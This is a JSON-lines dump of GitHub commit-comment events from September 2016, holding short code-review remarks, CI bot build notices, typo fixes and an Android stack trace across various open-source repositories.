{"id":"4624031545","type":"CommitCommentEvent","actor":{"login":"Anoosha-Shetty"},"repo":{"name":"Anoosha-Shetty/Learn-Python"},"payload":{"comment":{"id":19190192,"position":null,"line":null,"path":null,"commit_id":"a8dafbb8aa45fa337c8c7f1bc9f8b7bd94da6434","created_at":"2016-09-27T13:05:03Z","updated_at":"2016-09-27T13:05:03Z","body":"udf1.py --> First udf"}},"created_at":"2016-09-27T13:05:03Z"}
{"id":"4624031867","type":"CommitCommentEvent","actor":{"login":"cimbalek"},"repo":{"name":"cimbalek/drools"},"payload":{"comment":{"id":19190194,"position":60,"line":75,"path":"drools-compiler/src/test/java/org/drools/compiler/integrationtests/DeleteTest.java","commit_id":"b0ea323a606f085fdd24e796db9d0d661cb05da7","created_at":"2016-09-27T13:05:06Z","updated_at":"2016-09-27T13:05:06Z","body":"Done."}},"created_at":"2016-09-27T13:05:06Z"}
{"id":"4624033251","type":"CommitCommentEvent","actor":{"login":"darren562"},"repo":{"name":"zhenyong/vue-router"},"payload":{"comment":{"id":19190197,"position":5,"line":5,"path":"docs/zh-cn/advanced/data-fetching.md","commit_id":"4616ab25e2b78206114bb473d10ac87b896215c5","created_at":"2016-09-27T13:05:20Z","updated_at":"2016-09-27T13:05:20Z","body":"在数据获取期间展示获取状态   →  在数据获取期间显示加载中。"}},"created_at":"2016-09-27T13:05:20Z"}
{"id":"4624034303","type":"CommitCommentEvent","actor":{"login":"fashioncj"},"repo":{"name":"CyanogenMod/android_device_motorola_thea"},"payload":{"comment":{"id":19190199,"position":null,"line":null,"path":null,"commit_id":"74a0e4b901ad09c516df951ccf6b2ea278c7ae08","created_at":"2016-09-27T13:05:31Z","updated_at":"2016-09-27T13:05:31Z","body":"No catch parse exception on Phone APP:\r\n---\r\n09-27 20:57:07.369 711-1098/system_process E/Telecom: : Could not parse subId2 E: TSI.gCCPA@ADE\r\n                                                      java.lang.NumberFormatException: For input string: \"E\"\r\n                                                          at java.lang.Integer.parseInt(Integer.java:521)\r\n                                                          at java.lang.Integer.parseInt(Integer.java:556)\r\n                                                          at com.android.server.telecom.PhoneAccountRegistrar$6.compare(PhoneAccountRegistrar.java:853)\r\n                                                          at com.android.server.telecom.PhoneAccountRegistrar$6.compare(PhoneAccountRegistrar.java:838)\r\n                                                          at java.util.TimSort.countRunAndMakeAscending(TimSort.java:351)\r\n                                                          at java.util.TimSort.sort(TimSort.java:216)\r\n                                                          at java.util.Arrays.sort(Arrays.java:1523)\r\n                                                          at java.util.Collections.sort(Collections.java:238)\r\n                                                          at com.android.server.telecom.PhoneAccountRegistrar.getPhoneAccountHandles(PhoneAccountRegistrar.java:837)\r\n                                                          at com.android.server.telecom.PhoneAccountRegistrar.getCallCapablePhoneAccounts(PhoneAccountRegistrar.java:555)\r\n                                                          at com.android.server.telecom.TelecomServiceImpl$1.getCallCapablePhoneAccounts(TelecomServiceImpl.java:192)\r\n                                                          at com.android.internal.telecom.ITelecomService$Stub.onTransact(ITelecomService.java:114)\r\n                                                          at android.os.Binder.execTransact(Binder.java:565)\r\n09-27 20:57:07.376 711-1098/system_process E/Telecom: : Could not parse subId2 E: TSI.gCCPA@ADE\r\n                                                      java.lang.NumberFormatException: For input string: \"E\"\r\n                                                          at java.lang.Integer.parseInt(Integer.java:521)\r\n                                                          at java.lang.Integer.parseInt(Integer.java:556)\r\n                                                          at com.android.server.telecom.PhoneAccountRegistrar$6.compare(PhoneAccountRegistrar.java:853)\r\n                                                          at com.android.server.telecom.PhoneAccountRegistrar$6.compare(PhoneAccountRegistrar.java:838)\r\n                                                          at java.util.TimSort.binarySort(TimSort.java:292)\r\n                                                          at java.util.TimSort.sort(TimSort.java:217)\r\n                                                          at java.util.Arrays.sort(Arrays.java:1523)\r\n                                                          at java.util.Collections.sort(Collections.java:238)\r\n                                                          at com.android.server.telecom.PhoneAccountRegistrar.getPhoneAccountHandles(PhoneAccountRegistrar.java:837)\r\n                                                          at com.android.server.telecom.PhoneAccountRegistrar.getCallCapablePhoneAccounts(PhoneAccountRegistrar.java:555)\r\n                                                          at com.android.server.telecom.TelecomServiceImpl$1.getCallCapablePhoneAccounts(TelecomServiceImpl.java:192)\r\n                                                          at com.android.internal.telecom.ITelecomService$Stub.onTransact(ITelecomService.java:114)\r\n                                                          at android.os.Binder.execTransact(Binder.java:565)"}},"created_at":"2016-09-27T13:05:31Z"}
{"id":"4624035979","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19190204,"position":null,"line":null,"path":null,"commit_id":"acd75a57be96fe91a987630bc2cbf4f3f8a4188b","created_at":"2016-09-27T13:05:47Z","updated_at":"2016-09-27T13:05:47Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1173](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14334&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-27T13:05:47Z"}
{"id":"4624039614","type":"CommitCommentEvent","actor":{"login":"lambdapioneer"},"repo":{"name":"facebook/fresco"},"payload":{"comment":{"id":19190218,"position":null,"line":null,"path":null,"commit_id":"50aad945e8ce3e703aac18260dd7c46fce1546c3","created_at":"2016-09-27T13:06:26Z","updated_at":"2016-09-27T13:06:26Z","body":"These are some sample outputs for comparision:\r\n\r\n### Original\r\n\r\n<img src=\"https://cloud.githubusercontent.com/assets/908387/18874661/721bcbf2-84ba-11e6-9cf9-d0d59b9c03fb.jpg\" width=\"300px\" />\r\n\r\n### Fresco Blur: iterations=2, radius=12\r\n\r\n<img src=\"https://cloud.githubusercontent.com/assets/908387/18874669/7af45802-84ba-11e6-97fa-8472dfaa911a.png\" width=\"300px\" />\r\n\r\n### Fresco Blur: iterations=3, radius=12\r\n\r\n<img src=\"https://cloud.githubusercontent.com/assets/908387/18874690/8b59ad82-84ba-11e6-8530-51d0759df9b6.png\" width=\"300px\" />\r\n\r\n### Fresco Blur: iterations=3, radius=25\r\n\r\n<img src=\"https://cloud.githubusercontent.com/assets/908387/18874698/953833b4-84ba-11e6-94c2-8eae01599f76.png\" width=\"300px\" />\r\n\r\n### For comparision: Photoshop Gaussian Blur Filter: radius=25\r\n\r\n<img src=\"https://cloud.githubusercontent.com/assets/908387/18874705/9e3d9a94-84ba-11e6-9d3c-d9f3dbdab993.png\" width=\"300px\" />\r\n"}},"created_at":"2016-09-27T13:06:26Z"}
{"id":"4624040160","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19190224,"position":null,"line":null,"path":null,"commit_id":"d06e42c78d36fb9eaddbee84bff9893d76894940","created_at":"2016-09-27T13:06:33Z","updated_at":"2016-09-27T13:06:33Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#AXW2f-QYTLOhKQiOHQS2nw"}},"created_at":"2016-09-27T13:06:33Z"}
{"id":"4624041345","type":"CommitCommentEvent","actor":{"login":"Floessie"},"repo":{"name":"Beep6581/RawTherapee"},"payload":{"comment":{"id":19190228,"position":null,"line":null,"path":null,"commit_id":"d076223293e0cb53dfad5496c3610c318960676e","created_at":"2016-09-27T13:06:46Z","updated_at":"2016-09-27T13:06:46Z","body":":+1: "}},"created_at":"2016-09-27T13:06:46Z"}
{"id":"4624042153","type":"CommitCommentEvent","actor":{"login":"juliangruber"},"repo":{"name":"component/path-to-regexp"},"payload":{"comment":{"id":19190229,"position":null,"line":null,"path":null,"commit_id":"d3e084b4c52e5a3d6b762511d0912e61c136bbbf","created_at":"2016-09-27T13:06:54Z","updated_at":"2016-09-27T13:06:54Z","body":"@Braidis what do you mean?"}},"created_at":"2016-09-27T13:06:54Z"}
{"id":"4624043532","type":"CommitCommentEvent","actor":{"login":"mausalimi"},"repo":{"name":"downthemall/downthemall"},"payload":{"comment":{"id":19190232,"position":null,"line":null,"path":null,"commit_id":"820a28acc3e2ac9f0b1de438afcf51591f1ceef3","created_at":"2016-09-27T13:07:12Z","updated_at":"2016-09-27T13:07:12Z","body":"this somehow breaks the toolbar button for the manager. if i click this button, nothing happens at all.\r\n\r\nthanks for the fine tool, btw."}},"created_at":"2016-09-27T13:07:12Z"}
{"id":"4624044716","type":"CommitCommentEvent","actor":{"login":"Jawshy"},"repo":{"name":"AsYetUntitled/Framework"},"payload":{"comment":{"id":19190233,"position":null,"line":null,"path":null,"commit_id":"163a3bd3860cb7d969a205ad37326489a6113cce","created_at":"2016-09-27T13:07:25Z","updated_at":"2016-09-27T13:07:25Z","body":"> ...or when using ISSUE_TEMPLATE.md. \r\n\r\nviewing* \r\n"}},"created_at":"2016-09-27T13:07:25Z"}
{"id":"4624049213","type":"CommitCommentEvent","actor":{"login":"mikelmaron"},"repo":{"name":"openstreetmap/openstreetmap-website"},"payload":{"comment":{"id":19190236,"position":null,"line":null,"path":null,"commit_id":"fdcd867de6574688935458f3c099beb5987a1c6e","created_at":"2016-09-27T13:08:14Z","updated_at":"2016-09-27T13:08:14Z","body":"Ok, I see @simonpoole. Focusing openstreetmap-website repo, a mirror of an OSM.org hosted repo, is a different situation perhaps than other projects in the organization. This may be something we want to look into at some point, but it doesn't seem particularly high priority."}},"created_at":"2016-09-27T13:08:14Z"}
{"id":"4624051284","type":"CommitCommentEvent","actor":{"login":"chteuchteu"},"repo":{"name":"munin-monitoring/munin-monitoring.github.io"},"payload":{"comment":{"id":19190238,"position":null,"line":null,"path":null,"commit_id":"024f5fc0340029b0772a724f287257d85cfe6420","created_at":"2016-09-27T13:08:37Z","updated_at":"2016-09-27T13:08:37Z","body":"I always add a robots.txt file inside my web projects, even if it is useless (if it does not block anything), it avoids flooding server logs with 404 errors when search engines tries to access it. Plus, it \"may\" be better for SEO.\r\n\r\nI haven't re-read it when I saw this commit, and forgot that I added it to avoid this site (when hosted on a showcase temp URL) from being indexed from search engines. Your commit is totally legit, my bad\r\n\r\nI'll add a new (legit) one later, when it'll be necessary"}},"created_at":"2016-09-27T13:08:37Z"}
{"id":"4624053068","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19190242,"position":null,"line":null,"path":null,"commit_id":"fea544ca49a8e72278c68f2284c8162e3687f7f6","created_at":"2016-09-27T13:08:56Z","updated_at":"2016-09-27T13:08:56Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#bfYQxfIQStyY97u1J3zFew"}},"created_at":"2016-09-27T13:08:56Z"}
{"id":"4624053134","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19190243,"position":null,"line":null,"path":null,"commit_id":"acd75a57be96fe91a987630bc2cbf4f3f8a4188b","created_at":"2016-09-27T13:08:57Z","updated_at":"2016-09-27T13:08:57Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1173](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14334&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:03:10"}},"created_at":"2016-09-27T13:08:57Z"}
{"id":"4624054973","type":"CommitCommentEvent","actor":{"login":"fjlopez"},"repo":{"name":"dbarelop/lab1-git-race"},"payload":{"comment":{"id":19190246,"position":null,"line":null,"path":null,"commit_id":"237bbab44aab288a3e45f3bef7dc1e67bad8cf51","created_at":"2016-09-27T13:09:17Z","updated_at":"2016-09-27T13:09:17Z","body":"Good point!! You have solved one of the bugs of the code. I recommend to add a brief explanation detailing why the old code had a race condition."}},"created_at":"2016-09-27T13:09:17Z"}
{"id":"4624056356","type":"CommitCommentEvent","actor":{"login":"xiasf"},"repo":{"name":"xiasf/github-note"},"payload":{"comment":{"id":19190249,"position":1,"line":1,"path":"test","commit_id":"da8a68c5299d675fe2e3f01daba8189d7ebd75b8","created_at":"2016-09-27T13:09:32Z","updated_at":"2016-09-27T13:09:32Z","body":"哈哈！"}},"created_at":"2016-09-27T13:09:32Z"}
{"id":"4624059023","type":"CommitCommentEvent","actor":{"login":"sudoes"},"repo":{"name":"aspnet/Docs"},"payload":{"comment":{"id":19190255,"position":112,"line":112,"path":"aspnet/publishing/linuxproduction.rst","commit_id":"79ce94a6786cd590aa7d38a0434ca2d2d6c56b6a","created_at":"2016-09-27T13:10:03Z","updated_at":"2016-09-27T13:10:03Z","body":"mangage should be manage. Small typos there"}},"created_at":"2016-09-27T13:10:03Z"}
{"id":"4624061925","type":"CommitCommentEvent","actor":{"login":"xiasf"},"repo":{"name":"xiasf/github-note"},"payload":{"comment":{"id":19190264,"position":1,"line":1,"path":"test","commit_id":"da8a68c5299d675fe2e3f01daba8189d7ebd75b8","created_at":"2016-09-27T13:10:35Z","updated_at":"2016-09-27T13:10:35Z","body":"xixi nice!"}},"created_at":"2016-09-27T13:10:35Z"}
{"id":"4624062274","type":"CommitCommentEvent","actor":{"login":"AndreyTsvetkov"},"repo":{"name":"Fridrirh/sommelier"},"payload":{"comment":{"id":19190265,"position":9,"line":37,"path":"model/storage.js","commit_id":"d9a1463cc1800c74bc54a53a95af5bd5ff6c78e0","created_at":"2016-09-27T13:10:39Z","updated_at":"2016-09-27T13:10:39Z","body":"имя Insert предполагает вставку чего-либо, после нее должно увеличиться количество записей. в нашем случае это не insert, а update"}},"created_at":"2016-09-27T13:10:39Z"}
{"id":"4624062862","type":"CommitCommentEvent","actor":{"login":"xiasf"},"repo":{"name":"xiasf/github-note"},"payload":{"comment":{"id":19190266,"position":1,"line":1,"path":"test","commit_id":"da8a68c5299d675fe2e3f01daba8189d7ebd75b8","created_at":"2016-09-27T13:10:46Z","updated_at":"2016-09-27T13:10:46Z","body":"嘻嘻！"}},"created_at":"2016-09-27T13:10:46Z"}
{"id":"4624065109","type":"CommitCommentEvent","actor":{"login":"xiasf"},"repo":{"name":"xiasf/github-note"},"payload":{"comment":{"id":19190270,"position":1,"line":1,"path":"test","commit_id":"da8a68c5299d675fe2e3f01daba8189d7ebd75b8","created_at":"2016-09-27T13:11:11Z","updated_at":"2016-09-27T13:11:11Z","body":"哈哈哈哈哈！"}},"created_at":"2016-09-27T13:11:11Z"}
{"id":"4624066316","type":"CommitCommentEvent","actor":{"login":"xiasf"},"repo":{"name":"xiasf/github-note"},"payload":{"comment":{"id":19190273,"position":1,"line":1,"path":"test","commit_id":"da8a68c5299d675fe2e3f01daba8189d7ebd75b8","created_at":"2016-09-27T13:11:23Z","updated_at":"2016-09-27T13:11:23Z","body":"嘻嘻嘻"}},"created_at":"2016-09-27T13:11:23Z"}
{"id":"4624068605","type":"CommitCommentEvent","actor":{"login":"petroyurchyshyn"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19190275,"position":30,"line":30,"path":"language-project/web/src/main/java/language/servlet/HomeController.java","commit_id":"d42290f4bf4989fcf929d06843b604e4cdfe4a4c","created_at":"2016-09-27T13:11:47Z","updated_at":"2016-09-27T13:11:47Z","body":"такое должно быть только на уровне DAO"}},"created_at":"2016-09-27T13:11:47Z"}
{"id":"4624068752","type":"CommitCommentEvent","actor":{"login":"AndreyTsvetkov"},"repo":{"name":"Fridrirh/sommelier"},"payload":{"comment":{"id":19190276,"position":5,"line":31,"path":"index.html","commit_id":"14e339e24c541f4879f813881c87f2b0cffa5fdc","created_at":"2016-09-27T13:11:49Z","updated_at":"2016-09-27T13:11:49Z","body":"отличная замена, только  D**e**gustation"}},"created_at":"2016-09-27T13:11:49Z"}
{"id":"4624073355","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":19190309,"position":null,"line":null,"path":null,"commit_id":"b0cc696cf1a6b7b05cb823a9a6b23519059666f0","created_at":"2016-09-27T13:12:39Z","updated_at":"2016-09-27T13:12:39Z","body":"RookOnPawn is a completely different animal.\nIt is for Rooks on rank 5 6 7 or 8.\nIt is more a bonus to \"align\" with opponent pawns, whether they are \nprotected or not.\n\nFor example, White Ra6 and pawn g6, black pawns on a7 b6 and g7 h6.\n\nIt will deserve 3 RookOnPawn bonus for a7, b6 and even h6 !!!,\nand one SemiOpen file bonus for file A\nand one Threat[2][PAWN] bonus for a7\nand finally a PSQT[ROOK][SQ_A6]\n\nA bit overlapping, but any attempt to simply this or improve this never \nworked.\n\n\nLe 2016-09-27 à 08:32, FauziAkram a écrit :\n>\n> I see, But if we have here a bonus for a Rook attacking a pawn, then \n> why do we have a RookOnPawn bonus?\n> I mean, wouldn't we just remove the Rookonpawn code and just adding up \n> the bonus into the S(0, 25) ?\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/FauziAkram/Stockfish/commit/b0cc696cf1a6b7b05cb823a9a6b23519059666f0#commitcomment-19189732>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/AIiPhpmgrUMIxR6-VeNhBdbdzvOYiL6zks5quQz5gaJpZM4KHEPG>.\n>\n\n"}},"created_at":"2016-09-27T13:12:39Z"}
{"id":"4624073883","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":19190312,"position":null,"line":null,"path":null,"commit_id":"6b1ae0448004bea94154ac6a489afffb4045adc2","created_at":"2016-09-27T13:12:45Z","updated_at":"2016-09-27T13:12:45Z","body":"saw approval from fadushin\nat https://github.com/basho/riak_kv/commit/6b1ae0448004bea94154ac6a489afffb4045adc2"}},"created_at":"2016-09-27T13:12:45Z"}
{"id":"4624073944","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":19190313,"position":null,"line":null,"path":null,"commit_id":"6b1ae0448004bea94154ac6a489afffb4045adc2","created_at":"2016-09-27T13:12:45Z","updated_at":"2016-09-27T13:12:45Z","body":"merging basho/riak_kv/dr-fix-bad-pattern-match = 6b1ae044 into borshop-integration-1487-dr-fix-bad-pattern-match"}},"created_at":"2016-09-27T13:12:45Z"}
{"id":"4624073965","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":19190314,"position":null,"line":null,"path":null,"commit_id":"6b1ae0448004bea94154ac6a489afffb4045adc2","created_at":"2016-09-27T13:12:45Z","updated_at":"2016-09-27T13:12:45Z","body":"basho/riak_kv/dr-fix-bad-pattern-match = 6b1ae044 merged ok, testing candidate = a7ca9045"}},"created_at":"2016-09-27T13:12:45Z"}
{"id":"4624074733","type":"CommitCommentEvent","actor":{"login":"iSinch"},"repo":{"name":"begeekmyfriend/yasea"},"payload":{"comment":{"id":19190317,"position":54,"line":333,"path":"app/src/main/java/net/ossrs/yasea/rtmp/io/RtmpConnection.java","commit_id":"daeafb31609e91f13d5628643f1d06ae554fd0f5","created_at":"2016-09-27T13:12:53Z","updated_at":"2016-09-27T13:12:53Z","body":"It still bug :("}},"created_at":"2016-09-27T13:12:53Z"}
{"id":"4624075428","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sdpernick/layout-challenge"},"payload":{"comment":{"id":19190320,"position":50,"line":50,"path":"css/style_marketing.css","commit_id":"54417711d7226f66ec849c0932f2b0412699ae8d","created_at":"2016-09-27T13:13:00Z","updated_at":"2016-09-27T13:13:00Z","body":"should be 33.33%"}},"created_at":"2016-09-27T13:13:00Z"}
{"id":"4624077054","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sdpernick/layout-challenge"},"payload":{"comment":{"id":19190326,"position":58,"line":58,"path":"css/style_marketing.css","commit_id":"54417711d7226f66ec849c0932f2b0412699ae8d","created_at":"2016-09-27T13:13:17Z","updated_at":"2016-09-27T13:13:17Z","body":"should be 33.33% "}},"created_at":"2016-09-27T13:13:17Z"}
{"id":"4624077245","type":"CommitCommentEvent","actor":{"login":"nmaier"},"repo":{"name":"downthemall/downthemall"},"payload":{"comment":{"id":19190327,"position":null,"line":null,"path":null,"commit_id":"820a28acc3e2ac9f0b1de438afcf51591f1ceef3","created_at":"2016-09-27T13:13:19Z","updated_at":"2016-09-27T13:13:19Z","body":"break how? file in issue please, @mausalimi "}},"created_at":"2016-09-27T13:13:19Z"}
{"id":"4624077335","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sdpernick/layout-challenge"},"payload":{"comment":{"id":19190328,"position":65,"line":65,"path":"css/style_marketing.css","commit_id":"54417711d7226f66ec849c0932f2b0412699ae8d","created_at":"2016-09-27T13:13:20Z","updated_at":"2016-09-27T13:13:20Z","body":"should be 33.33% "}},"created_at":"2016-09-27T13:13:20Z"}
{"id":"4624078609","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":19190333,"position":null,"line":null,"path":null,"commit_id":"b0cc696cf1a6b7b05cb823a9a6b23519059666f0","created_at":"2016-09-27T13:13:34Z","updated_at":"2016-09-27T13:13:34Z","body":"RookOnPawn is a completely different animal.\r\nIt is for Rooks on rank 5 6 7 or 8.\r\nIt is more a bonus to \"align\" with opponent pawns, whether they are protected or not.\r\n\r\nFor example, White Ra6 and pawn g6, black pawns on a7 b6 and g7 h6.\r\n\r\nIt will deserve 3 RookOnPawn bonus for a7, b6 and even h6 !!!,\r\nand one SemiOpen file bonus for file A\r\nand one Threat[2][PAWN] bonus for a7\r\nand finally a PSQT[ROOK][SQ_A6]\r\n\r\nA bit overlapping, but any attempt to simply this or improve this never worked."}},"created_at":"2016-09-27T13:13:34Z"}
{"id":"4624078796","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19190334,"position":null,"line":null,"path":null,"commit_id":"deb963fad47e8ea8bf02973cfa8c2ea11cf517b7","created_at":"2016-09-27T13:13:37Z","updated_at":"2016-09-27T13:13:37Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#PFKym3vGSkOkwiEXgjW1Vw"}},"created_at":"2016-09-27T13:13:37Z"}
{"id":"4624081340","type":"CommitCommentEvent","actor":{"login":"powli"},"repo":{"name":"SpaceKrakens/Ranked-Vote"},"payload":{"comment":{"id":19190340,"position":5,"line":5,"path":"views/pages/vote.ejs","commit_id":"57bde16eb284a1b98b76a098bd66542bbe92c08a","created_at":"2016-09-27T13:14:04Z","updated_at":"2016-09-27T13:14:04Z","body":"That makes invalid html. While most browsers will render it fine it is still bad practice, li elements need to be children of a ol or ul element "}},"created_at":"2016-09-27T13:14:04Z"}
{"id":"4624081799","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sdpernick/layout-challenge"},"payload":{"comment":{"id":19190342,"position":74,"line":74,"path":"css/style_marknav.css","commit_id":"54417711d7226f66ec849c0932f2b0412699ae8d","created_at":"2016-09-27T13:14:10Z","updated_at":"2016-09-27T13:14:10Z","body":"should be 33.33% "}},"created_at":"2016-09-27T13:14:10Z"}
{"id":"4624082867","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sdpernick/layout-challenge"},"payload":{"comment":{"id":19190345,"position":81,"line":81,"path":"css/style_marknav.css","commit_id":"54417711d7226f66ec849c0932f2b0412699ae8d","created_at":"2016-09-27T13:14:21Z","updated_at":"2016-09-27T13:14:21Z","body":"should be 33.33%, why does this one not have float set?"}},"created_at":"2016-09-27T13:14:21Z"}
{"id":"4624083192","type":"CommitCommentEvent","actor":{"login":"briandipalma"},"repo":{"name":"caplin/caplin-dev-tools"},"payload":{"comment":{"id":19190346,"position":null,"line":null,"path":null,"commit_id":"940c90b1844111a3b4fea86290fc247a62186a6d","created_at":"2016-09-27T13:14:25Z","updated_at":"2016-09-27T13:14:25Z","body":"@bit-shifter The latest code in the repo does allow you to configure the directory value so it is generic. I'm not sure if this is an OK approach though, I may change the code when we convert SalesTrader."}},"created_at":"2016-09-27T13:14:25Z"}
{"id":"4624083807","type":"CommitCommentEvent","actor":{"login":"fjlopez"},"repo":{"name":"josnick/lab1-git-race"},"payload":{"comment":{"id":19190347,"position":null,"line":null,"path":null,"commit_id":"99c01dd38f51346dbd2cbef26fddbc647d6398de","created_at":"2016-09-27T13:14:31Z","updated_at":"2016-09-27T13:14:31Z","body":"**Hint:** The issues that you have related to the format can be fixed with the **Code Formatter** of your IDE automatically (usually)."}},"created_at":"2016-09-27T13:14:31Z"}
{"id":"4624086865","type":"CommitCommentEvent","actor":{"login":"petroyurchyshyn"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19190353,"position":55,"line":55,"path":"language-project/web/src/main/java/language/servlet/RegistrationController.java","commit_id":"d42290f4bf4989fcf929d06843b604e4cdfe4a4c","created_at":"2016-09-27T13:15:05Z","updated_at":"2016-09-27T13:15:05Z","body":"отлично что решил сделать валидацию"}},"created_at":"2016-09-27T13:15:05Z"}
{"id":"4624087744","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sdpernick/layout-challenge"},"payload":{"comment":{"id":19190354,"position":56,"line":56,"path":"index_marknav.html","commit_id":"54417711d7226f66ec849c0932f2b0412699ae8d","created_at":"2016-09-27T13:15:14Z","updated_at":"2016-09-27T13:15:14Z","body":"oops got an extra angle bracket at the beginning here!"}},"created_at":"2016-09-27T13:15:14Z"}
{"id":"4624091518","type":"CommitCommentEvent","actor":{"login":"darren562"},"repo":{"name":"zhenyong/vue-router"},"payload":{"comment":{"id":19190363,"position":35,"line":35,"path":"docs/zh-cn/advanced/lazy-loading.md","commit_id":"4616ab25e2b78206114bb473d10ac87b896215c5","created_at":"2016-09-27T13:15:52Z","updated_at":"2016-09-27T13:15:52Z","body":"把组件按块分组"}},"created_at":"2016-09-27T13:15:52Z"}
{"id":"4624094567","type":"CommitCommentEvent","actor":{"login":"powli"},"repo":{"name":"SpaceKrakens/Ranked-Vote"},"payload":{"comment":{"id":19190369,"position":4,"line":9,"path":"views/partials/head.ejs","commit_id":"078a49f2833c840c29ae54b232b1776507761ddd","created_at":"2016-09-27T13:16:23Z","updated_at":"2016-09-27T13:16:23Z","body":"Consider creating a separate css file  for that. Also, loading it after the bootstrap css allows you to overwrite styles from it"}},"created_at":"2016-09-27T13:16:23Z"}
{"id":"4624095302","type":"CommitCommentEvent","actor":{"login":"LomVal"},"repo":{"name":"LomVal/test"},"payload":{"comment":{"id":19190372,"position":null,"line":null,"path":null,"commit_id":"6a485487d5da842a75662e7eadda99015a1cc4b0","created_at":"2016-09-27T13:16:30Z","updated_at":"2016-09-27T13:16:30Z","body":"123"}},"created_at":"2016-09-27T13:16:30Z"}
{"id":"4624095576","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sdpernick/layout-challenge"},"payload":{"comment":{"id":19190374,"position":31,"line":31,"path":"index_marketing.html","commit_id":"54417711d7226f66ec849c0932f2b0412699ae8d","created_at":"2016-09-27T13:16:32Z","updated_at":"2016-09-27T13:16:32Z","body":"oops got an extra angle bracket at the beginning here!"}},"created_at":"2016-09-27T13:16:32Z"}
{"id":"4624097451","type":"CommitCommentEvent","actor":{"login":"petroyurchyshyn"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19190377,"position":48,"line":48,"path":"language-project/web/src/main/java/language/servlet/RegistrationController.java","commit_id":"d42290f4bf4989fcf929d06843b604e4cdfe4a4c","created_at":"2016-09-27T13:16:52Z","updated_at":"2016-09-27T13:16:52Z","body":"Подумай как можно обойтись без использования Map\r\n(можно и так оставить)"}},"created_at":"2016-09-27T13:16:52Z"}
{"id":"4624101481","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19190388,"position":null,"line":null,"path":null,"commit_id":"ff577c7d239921e1e9afd6e24a164bc0ac2a85ac","created_at":"2016-09-27T13:17:34Z","updated_at":"2016-09-27T13:17:34Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#RJUaZGyVQ_Go9wh3kzvZFw"}},"created_at":"2016-09-27T13:17:34Z"}
{"id":"4624103924","type":"CommitCommentEvent","actor":{"login":"devernay"},"repo":{"name":"devernay/openfx-misc"},"payload":{"comment":{"id":19190393,"position":null,"line":null,"path":null,"commit_id":"d80a81ae66911f54a382438efa47d1b1771a29d1","created_at":"2016-09-27T13:18:00Z","updated_at":"2016-09-27T13:18:00Z","body":"it only computes the statistics, but does not apply them.\r\nyou have to connect the results to another node, such as a Grade. It's the same usage as CurveTool in Nuke."}},"created_at":"2016-09-27T13:18:00Z"}
{"id":"4624104245","type":"CommitCommentEvent","actor":{"login":"fuzzy-id"},"repo":{"name":"fuzzy-id/salt"},"payload":{"comment":{"id":19190394,"position":null,"line":null,"path":null,"commit_id":"740516aace16ba7392702f6a158c6b03bc6e6198","created_at":"2016-09-27T13:18:04Z","updated_at":"2016-09-27T13:18:04Z","body":"This bug affects every version from `2014.7` onwards. Previous version did not accept `kwargs` in the function definition of `lvcreate`. "}},"created_at":"2016-09-27T13:18:04Z"}
{"id":"4624114393","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19190414,"position":null,"line":null,"path":null,"commit_id":"cdb36d700016a114623ad2b5f895dfacb8ff27b5","created_at":"2016-09-27T13:19:51Z","updated_at":"2016-09-27T13:19:51Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#aJEVL-UhSOCfTwhiVwqfMA"}},"created_at":"2016-09-27T13:19:51Z"}
